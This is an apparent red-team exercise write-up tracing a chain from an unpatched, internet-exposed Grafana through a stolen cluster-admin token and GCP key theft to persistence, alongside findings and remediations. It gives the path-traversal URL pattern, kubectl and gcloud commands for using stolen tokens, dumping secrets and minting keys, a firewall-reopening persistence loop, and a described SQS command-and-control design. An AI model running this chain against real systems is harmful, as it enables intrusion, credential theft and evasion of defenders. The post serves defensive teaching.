Red Team Exercise: Unpatched Grafana to Cluster Takeover
This post is about a red/blue team exercise we ran on a recent project against a staging cluster. I led the red team. The goal was to demonstrate how far an attacker could get from a starting position of external network access. The finding was a complete chain from an unpatched service to full cluster control — achieved entirely through misconfigurations, no zero-days required. I'm writing this because the chain illustrates something important about how real attacks work.
Scope: staging cluster only, no production systems, no actual data exfiltration outside a controlled log. The blue team's job was to detect and respond. Everything described here was authorized, documented, and scoped in advance.
Initial Access: Unpatched Grafana
Reconnaissance identified a Grafana instance running on a non-standard port, reachable from the public internet. The GKE firewall rule had a source range of 0.0.0.0/0 — open to everything. The rule's description read "DEBUG", which told the whole story: an engineer had opened it wide while troubleshooting something and never removed it. The monitoring subnet restriction that should have been there wasn't.
The Grafana version was current as of roughly 18 months prior, which placed it in range of CVE-2021-43798. That CVE is a path traversal vulnerability in Grafana's plugin serving code — unauthenticated requests to URLs like /public/plugins/alertlist/../../../ could read arbitrary files on the server. It was a real, well-documented, widely exploited vulnerability with a patch available. The instance just hadn't been updated.
I'll be clear about what I'm describing: this is a published CVE with a patch. The educational point is about the misconfiguration that left it unpatched and reachable, not about exploiting unpatched systems without authorization. If you're running Grafana, check your version.
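Checking is quick from the defender's side: Grafana's unauthenticated /api/health endpoint reports the running version. A minimal sketch; the hostname and port below are placeholders.

```shell
# Grafana's /api/health endpoint is unauthenticated and reports the
# running version; hostname and port are placeholders for your instance.
curl -s http://grafana.staging.example.com:3000/api/health | jq -r .version
```

Per Grafana's advisory, the CVE-2021-43798 fixes landed in 8.0.7, 8.1.8, 8.2.7, and 8.3.1; anything older in the 8.x line is in scope.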
With unauthenticated access through the path traversal, the next question was: what's interesting on this server?
What You Can Do With Unauthenticated Grafana Access
Even without the path traversal, many Grafana instances are misconfigured to allow anonymous access or have weak credentials. If you can reach Grafana's UI or API without authentication, you can:
- Read all dashboards. Dashboards contain the queries and data source references for everything that's being monitored. This is a map of what services exist and how they're instrumented.
- Read data source configurations via the API:
GET /api/datasources. This returns the list of data sources — Prometheus, InfluxDB, CloudWatch, whatever is configured.
The data source configuration is where this gets serious. Grafana stores connection details for data sources, and for some data source types, it stores credentials in plaintext in the configuration that the API returns. In this case, the Prometheus data source configuration contained a bearer token for authentication.
{
"type": "prometheus",
"url": "http://prometheus.monitoring.svc.cluster.local:9090",
"basicAuth": false,
"jsonData": {},
"secureJsonFields": {
"httpHeaderValue1": true
}
}
The actual token value is masked in the API response for secured fields — but the path traversal let me read the Grafana database file directly, and the token was stored there.
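To audit your own instance for this exposure, the same API can be queried with admin credentials and reduced to what matters. A sketch, with placeholder hostname and credentials:

```shell
# List each data source's name, type, target URL, and which secure
# fields are set; credentials and hostname are placeholders.
curl -s -u "admin:$GRAFANA_ADMIN_PASSWORD" \
  http://grafana.staging.example.com:3000/api/datasources |
  jq '.[] | {name, type, url, secureJsonFields}'
```

Any credential that shows up outside the secureJsonFields mechanism, or any datasource row old enough to predate secure storage, is worth rotating.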
Stage 2: Prometheus Token to Cluster Admin
The token was a Kubernetes service account token. The Prometheus service account is responsible for scraping metrics from cluster nodes and pods — it needs permission to read metrics endpoints across the cluster. In this staging cluster, that service account had been granted cluster-admin privileges.
This is a common mistake, and I want to be precise about why it happens: when setting up Prometheus, you follow the documentation, you need permissions to scrape node metrics, and the path of least resistance is to grant a broad role. Staging clusters get this treatment more often than production — it's just staging, the thinking goes. But staging clusters aren't exempt from the security practices that matter, especially when they share network paths with other environments or when staging credentials can be escalated.
With the token:
kubectl --token=$PROMETHEUS_TOKEN --server=https://k8s-api-endpoint get nodes
That returned a list of all cluster nodes. Full cluster access confirmed.
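You don't have to guess at a token's privileges — the API server will tell you directly, which is equally useful for auditing your own service accounts. A sketch; the server URL is a placeholder:

```shell
# Enumerate the token's effective permissions. A cluster-admin binding
# shows up as a wildcard rule: resources "*.*" with verbs [*].
kubectl --token="$PROMETHEUS_TOKEN" --server="$K8S_API" auth can-i --list |
  grep -q '\*\.\*' && echo "token has wildcard (cluster-admin-like) access"
```

Running this against every service account token in a cluster is a cheap way to find over-privileged bindings before an attacker does.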
Stage 3: GCP Service Account Secret in the Cluster
The first thing you do with cluster-admin is enumerate secrets. The cluster was running on GKE, and workloads regularly need GCP service account credentials to interact with Cloud APIs. Those credentials frequently end up as Kubernetes secrets.
kubectl --token=$PROMETHEUS_TOKEN get secrets --all-namespaces -o json | \
jq '.items[] | select(.data."service_account.json" != null) | .metadata'
One secret stood out. A GCP service account key stored in a CI/CD namespace. The service account had been granted broad permissions — roles/iam.serviceAccountKeyAdmin among others. This meant it could not only access GCP resources, but create new service account keys for other service accounts. That's a significant escalation: with the ability to generate keys, you can mint persistent credentials that aren't tied to the Kubernetes session you came in through.
The service account also had access to the build server — a GCP VM running the CI/CD toolchain.
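The defensive check here is to enumerate which roles a given service account actually holds. A sketch using gcloud's flatten/filter syntax; project and account names are placeholders:

```shell
# List every role bound to one service account at the project level;
# the project ID and account email are placeholders.
gcloud projects get-iam-policy "$PROJECT_ID" \
  --flatten='bindings[].members' \
  --filter='bindings.members:serviceAccount:build-sa@project.iam.gserviceaccount.com' \
  --format='value(bindings.role)'
```

Seeing roles/iam.serviceAccountKeyAdmin in that output is the red flag: it means this one credential can mint credentials for others.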
Stage 4: Build Server Access and Key Generation
From outside the cluster, using the exfiltrated GCP service account key:
gcloud auth activate-service-account --key-file=sa-key.json
gcloud compute ssh build-server --zone=us-central1-a
On the build server, we found additional service account keys in the CI/CD tooling's configuration, along with access to GCS buckets used for build artifacts and staging deployments. More importantly, the key admin permissions let us generate new credentials:
gcloud iam service-accounts keys create new-key.json \
--iam-account=build-sa@project.iam.gserviceaccount.com
New keys persist independently of the Kubernetes tokens we came in through. Even if the cluster access got revoked, these new keys would still work.
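The defensive counterpart is auditing which service accounts have long-lived, user-managed keys at all. A sketch with a placeholder account:

```shell
# List user-managed (exportable, long-lived) keys for a service account;
# Google-managed keys are excluded. The account email is a placeholder.
gcloud iam service-accounts keys list \
  --iam-account="build-sa@project.iam.gserviceaccount.com" \
  --managed-by=user \
  --format='value(name.basename(), validAfterTime)'
```

Every key in that list is a credential that survives outside the cluster and outside any pod lifecycle; a nonempty list is a prompt to ask why Workload Identity isn't being used instead.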
Stage 5: Maintaining Persistence via Firewall Loop
Here's the part of the chain I'm most proud of from a tradecraft standpoint — and most embarrassed about from a security standpoint, since I was responsible for both.
The initial Grafana access depended on that DEBUG firewall rule staying open. A blue team response that deleted the rule would cut off our cluster API access. We needed a persistence mechanism that could survive a firewall change without requiring us to reestablish access from scratch.
We had GCP service account credentials with sufficient permissions to modify firewall rules. We set up a loop on infrastructure outside the cluster — a network of EC2 instances, eventually bouncing through a Raspberry Pi as an out-of-band control node — that continuously polled the GKE firewall and reset the 0.0.0.0/0 rule if it was removed:
# Running on external EC2 node, polling every 60 seconds
while true; do
  RULE=$(gcloud compute firewall-rules describe grafana-debug \
    --format='value(sourceRanges)' 2>/dev/null)
  if [[ -z "$RULE" ]]; then
    # Rule deleted outright: recreate it (port variable elided)
    gcloud compute firewall-rules create grafana-debug \
      --allow="tcp:$GRAFANA_PORT" --source-ranges=0.0.0.0/0
  elif [[ "$RULE" != "0.0.0.0/0" ]]; then
    # Rule merely restricted: widen it again
    gcloud compute firewall-rules update grafana-debug \
      --source-ranges=0.0.0.0/0
  fi
  sleep 60
done
This meant the blue team was playing whack-a-mole: they'd delete or restrict the rule, and within a minute it was back open. From their perspective it must have looked like the rule was being restored by an automated process — which it was, just not one they controlled.
The practical effect: even after the blue team noticed the anomalous access and started responding, we retained cluster API access because the firewall kept reopening. gcloud container clusters get-credentials kept working.
The lesson here is about persistence at the infrastructure level rather than the application level. We didn't need a backdoor in the cluster itself — we had a backdoor in the network perimeter.
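For defenders: every one of those automated resets left a trail in Cloud Audit Logs, including the caller's identity. A sketch of the query — the method-name filter is an assumption and may differ by API version:

```shell
# Pull recent firewall mutations and count them per principal; a service
# account rewriting the same rule once a minute stands out immediately.
gcloud logging read \
  'resource.type="gce_firewall_rule" AND protoPayload.methodName:"firewalls"' \
  --freshness=1h \
  --format='value(protoPayload.authenticationInfo.principalEmail)' |
  sort | uniq -c | sort -rn
```

A principal restoring a rule dozens of times an hour is either broken automation or an attacker; either way it deserves a page.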
Stage 6: The C2 Attempt That Didn't Work
With persistent cluster access, I wanted to push further — establish a command-and-control foothold that would survive even if we lost the SA credentials. The idea was an SQS-driven kubectl exec loop: deploy a pod in the cluster that polls an SQS queue for commands and execs them inside the cluster, sending results back.
The design was straightforward: a container that runs in the cluster, polls an SQS queue I controlled via a simple boto3 loop, receives commands as messages, and executes them via subprocess — effectively a relay from outside the cluster into the cluster's network.
The implementation failed for a practical reason: the image never got pulled. By the time I had built the container and written the deployment YAML, the blue team had locked down egress from the cluster's nodes, so they could no longer reach the external registry. The pod stayed in ImagePullBackOff. Without a pre-staged image in the cluster's internal registry, there was no way to get the container running.
This is a real lesson: C2 tooling you build on the fly during an exercise doesn't have the preparation of a real attacker's toolkit. A real attacker would have pre-positioned the image. We didn't have time to do that, and the window closed.
What We Still Had
The blue team locked us out of the cluster. The kubectl access was gone, the Grafana instance was taken down, and the DEBUG firewall rule was finally removed and locked. But we still had the GCP service account credentials we'd exfiltrated.
Those credentials had access to GCS buckets used for staging deployments. The staging environment's frontend assets — the compiled JS and HTML for the staging UI — were served directly from GCS buckets with public or de facto public access. We could read the staging application, enumerate configuration embedded in the frontend, and list what was deployed.
In a real attack, this is where you'd harvest API endpoints, auth tokens embedded in JS config files, backend URLs, feature flags, and anything else baked into the frontend build. The cluster was locked down, but the data layer was still accessible.
gcloud storage ls gs://staging-assets-bucket/
gcloud storage cp gs://staging-assets-bucket/main.js ./main.js
grep -E '(api|endpoint|token|key|secret)' main.js
We stopped here. The exercise was over and we had enough findings to fill a substantial report.
The Findings Report
Six findings, each necessary to understand the full chain:
Finding 1: Unpatched Grafana (CVE-2021-43798). The Grafana instance was running a version with a known, widely exploited path traversal vulnerability (CVSS 7.5, high). Remediation: immediate patch. Time to fix: 1 day.
Finding 2: Firewall rule 0.0.0.0/0 left open after debugging. The GKE firewall rule allowing access to Grafana had a source range of 0.0.0.0/0 and a description of "DEBUG" — meaning an engineer opened it to the internet while troubleshooting an issue and never cleaned it up. This finding in isolation was high severity: Grafana was publicly reachable with no network restriction whatsoever. Remediation: delete the DEBUG rule, add a properly-scoped rule restricted to the monitoring subnet. Time to fix: 5 minutes. This is the class of finding that keeps security teams up at night — not sophisticated, just forgotten.
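Finding rules like this one is a one-liner worth running on a schedule. A sketch — the filter syntax is an assumption worth verifying against your gcloud version:

```shell
# List enabled firewall rules open to the entire internet, with their
# descriptions; a description like "DEBUG" is the tell.
gcloud compute firewall-rules list \
  --filter='sourceRanges:0.0.0.0/0 AND disabled=false' \
  --format='table(name, sourceRanges.list(), description)'
```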
Finding 3: Over-privileged Prometheus service account. The Prometheus service account had cluster-admin ClusterRoleBinding. Prometheus requires read access to cluster metrics endpoints — specifically, it needs permission to list nodes, pods, services, and endpoints, and to read metrics from the kubelet API. It does not need cluster-admin. Remediation: create a minimal ClusterRole with only the permissions Prometheus actually requires. Time to fix: half a day to create and validate the scoped role.
Finding 4: GCP service account key with iam.serviceAccountKeyAdmin stored as cluster secret. A GCP service account key with broad IAM permissions — including the ability to create new service account keys — was stored as a Kubernetes secret in a CI/CD namespace. Once we had cluster-admin access, this was trivially readable. The key admin permission is particularly dangerous: it transforms a single compromised credential into the ability to mint persistent, hard-to-revoke new credentials. Remediation: remove key admin from the service account; use Workload Identity instead of storing SA keys as Kubernetes secrets. Time to fix: 1–2 days.
Finding 5: Build server SA keys accessible from compromised GCP credentials. The build server's CI/CD toolchain had service account keys stored in configuration files. Once we had access to the build server via the compromised GCP SA, we could read these keys and use them independently. Combined with Finding 4, this gave us a second-order persistence mechanism: keys we could use to authenticate as the CI/CD service accounts without ever touching the Kubernetes cluster again. Remediation: rotate all build server SA keys; audit which service accounts have keys vs. using short-lived tokens. Time to fix: 1 day for rotation, 1 sprint for migration to keyless auth.
Finding 6: GCS staging buckets de facto publicly accessible. Frontend build artifacts for the staging environment were stored in GCS buckets accessible with the compromised service account credentials. Configuration embedded in the compiled JS (API endpoints, backend URLs, environment-specific config) was readable. This is a common pattern that teams underestimate: staging isn't production, but staging configuration often points to real APIs or contains real credentials for non-prod services. Remediation: audit GCS bucket permissions; strip sensitive configuration from compiled frontend assets; use runtime injection for environment-specific config. Time to fix: 1 sprint.
Each finding was rated medium or high in isolation. Combined, they were critical.
Remediation Details
The Prometheus RBAC scoping is worth spelling out because it's the finding most teams will encounter in some form:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: prometheus-minimal
rules:
- apiGroups: [""]
  resources: ["nodes", "nodes/proxy", "nodes/metrics", "services", "endpoints", "pods"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["extensions", "networking.k8s.io"]
  resources: ["ingresses"]
  verbs: ["get", "list", "watch"]
- nonResourceURLs: ["/metrics", "/metrics/cadvisor"]
  verbs: ["get"]
This gives Prometheus what it needs to scrape cluster metrics. It grants no access to secrets, no ability to create pods, and no ability to modify RBAC policies. Binding this role instead of cluster-admin is the difference between "Prometheus token is interesting to an attacker" and "Prometheus token gives an attacker full cluster control."
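The role only takes effect once it's bound to the Prometheus service account. A sketch of the binding, assuming the service account is named prometheus in a monitoring namespace:

```yaml
# Bind the minimal role to the Prometheus service account
# (namespace and service account name are assumptions).
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: prometheus-minimal
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: prometheus-minimal
subjects:
- kind: ServiceAccount
  name: prometheus
  namespace: monitoring
```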
For GCP service accounts in GKE, the right pattern is Workload Identity:
# Kubernetes ServiceAccount
apiVersion: v1
kind: ServiceAccount
metadata:
  name: prometheus
  namespace: monitoring
  annotations:
    iam.gke.io/gcp-service-account: prometheus@project.iam.gserviceaccount.com

# Bind the KSA to the GSA
gcloud iam service-accounts add-iam-policy-binding \
  prometheus@project.iam.gserviceaccount.com \
  --role roles/iam.workloadIdentityUser \
  --member "serviceAccount:project.svc.id.goog[monitoring/prometheus]"
With Workload Identity, there's no SA key to steal. The pod gets short-lived tokens issued by GKE's OIDC provider. If the pod is deleted or the workload identity binding is removed, access stops. No keys stored in secrets, nothing to exfiltrate and use from outside the cluster.
The Lesson: Attackers Chain Small Issues
This is the thing I want the post to land on, because it's the thing that's hardest to convey in a vulnerability report:
Fixing any one of the six findings would have significantly degraded or broken the chain. But the structural lesson is about where the chain is actually fragile.
- Patch Grafana: no path traversal, no token access. Chain ends at step 1.
- Remove the DEBUG firewall rule: Grafana isn't publicly reachable, regardless of the Grafana version. Chain ends before step 1.
- Scope the Prometheus RBAC: the token is accessible but it can't enumerate secrets. Finding 4 is never discovered.
- Use Workload Identity instead of SA key secrets: even with cluster-admin, there's no exportable key to take out. The GCP pivot never happens.
- Remove key admin from the SA: we can't generate new persistent credentials. The external persistence loop is still possible with the original key, but we can't mint new ones.
- Restrict GCS bucket access: even after losing cluster access, there's nothing useful to read.
Each individual finding, when reviewed by a security team in isolation, could plausibly be rated medium severity and scheduled for the next sprint. That's often what happens. The attacker doesn't see six medium-severity findings — they see a chain.
The persistence mechanism in this exercise is the thing I'd highlight for defensive teams: we were using GCP IAM permissions we found inside the cluster to maintain access to the cluster's network perimeter. The blue team was responding at the Kubernetes layer (locking down the cluster API, revoking service account tokens) while we were operating at the GCP IAM layer (resetting firewall rules with credentials that hadn't been revoked yet). Those are different control planes, and incident response needs to cover both simultaneously.
When you find an active intrusion, the response isn't just "lock down the cluster." It's: enumerate all credentials that were accessible to the attacker, rotate them, and audit every action taken with those credentials before the rotation. In this case, that meant the Prometheus SA token, the GCP SA key from the cluster secret, all keys on the build server, and any keys generated using the key admin permission. Revoking access to the cluster is step one. It's not the last step.
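Rotation itself is mechanical once the inventory exists. A sketch, with placeholder names throughout, of revoking user-managed keys for one compromised service account and removing the leaked secret from the cluster:

```shell
# Delete every user-managed key on the compromised service account;
# the account email, secret name, and namespace are placeholders.
SA="build-sa@project.iam.gserviceaccount.com"
for key in $(gcloud iam service-accounts keys list \
    --iam-account="$SA" --managed-by=user --format='value(name.basename())'); do
  gcloud iam service-accounts keys delete "$key" --iam-account="$SA" --quiet
done
# Remove the leaked key material from the cluster, then redeploy
# consumers with Workload Identity instead of a stored key.
kubectl delete secret ci-sa-key --namespace ci-cd
```

The audit half — reviewing what was done with those credentials before rotation — is the part that can't be scripted; Cloud Audit Logs scoped to each principal is where that starts.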
Defense in depth isn't just about having multiple security controls. It's about ensuring that when one control fails (and they do fail), the next control in the chain limits what an attacker can do with that failure. Here, the controls were: patching (failed), network segmentation (failed), RBAC scoping (failed), secret management (failed), SA key admin scoping (failed), GCS access controls (partially failed). Six independent failures in sequence.
If your staging environment has services that haven't been patched in 18 months, firewall rules that were "good enough" when set up, and service accounts that were granted broad permissions for convenience — run the drill. You may find the same chain.